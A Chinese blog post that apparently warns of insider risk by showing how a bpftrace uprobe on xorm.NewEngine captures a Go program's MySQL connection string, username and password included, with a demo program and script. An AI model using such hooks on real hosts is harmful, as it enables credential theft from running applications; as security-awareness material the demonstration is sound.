用bpftrace窃取Mysql账号密码
2023-04-18 12:27:47 时间
前言
记得在360实习的时候,听到过一句话,大部分的安全问题并不是黑客造成的,而是内部人员。
epbf可以避免代码侵入,像桩子一样监控应用,同时也带来了一些安全问题。
下面简单演示一下如何利用bpftrace窃取Mysql的账号密码。
步骤
Go程序
- 这个程序只是利用xorm连接数据库,然后判断student这张表是否存在,
package main
import (
"fmt"
_ "github.com/go-sql-driver/mysql"
"log"
"xorm.io/xorm"
)
func main() {
db, err := xorm.NewEngine("mysql", "root:123456@tcp(127.0.0.1:3306)/testdb?charset=utf8&parseTime=True&loc=Asia%2FShanghai")
if err != nil {
log.Fatalln("fail to connect mysql", err)
}
fmt.Println(db.IsTableExist("student"))
db.Close()
}
bpftrace程序
#! /bin/bpftrace
uprobe:./main:"xorm.io/xorm.NewEngine"
{
printf("参数: %s
", str(reg("cx"),reg("di")));
}
运行结果
so,只要你有root权限,就有可能将各种敏感信息拿到手。
目前Linux内核和ebpf的应用在国内还没有铺开,相信未来会成为安全的挑战之一。
相关文章
- 大流量架构(一)之REDIS篇
- 大话ion系列(五)
- 共享经济模式下的边缘计算——PPIO边缘云 laaS技术实践分享
- 国产数据库丨国产数据库发展十策(一):开发一个数据库到底需要多少人?
- Oracle 21c 新特性:不可变表 Immutable tables 提高安全
- 恼人的空单元格,怎么查找,有很多办法
- 使用 Object.defineProperty 为对象定义属性
- Spark RDD 基础
- 硬件架构对 数据库的影响 MYSQL 应该在ARM 还是X86 (翻译)
- iOS 识别虚拟定位调研
- MongoDB3.2 存储策略
- 关于PCB板“阻抗”的小知识和阻抗计算小工具
- 记一次艰难的 bug 寻找
- Plotly+Pandas+Sklearn:打响kaggle第一枪
- 还在纠结CNN还是Transformer?清华发表一篇survey:全连接层才是终极答案!
- 为什么说智能式对话开始进入了黄金时期?
- Flink 实践教程-入门(8): 简单 ETL 作业
- Flink 实践教程:入门8-简单 ETL 作业
- Zabbix5系列之基于Centos7构建zabbix监控系统
- 主机安全评估工具的目的和安全评估的分类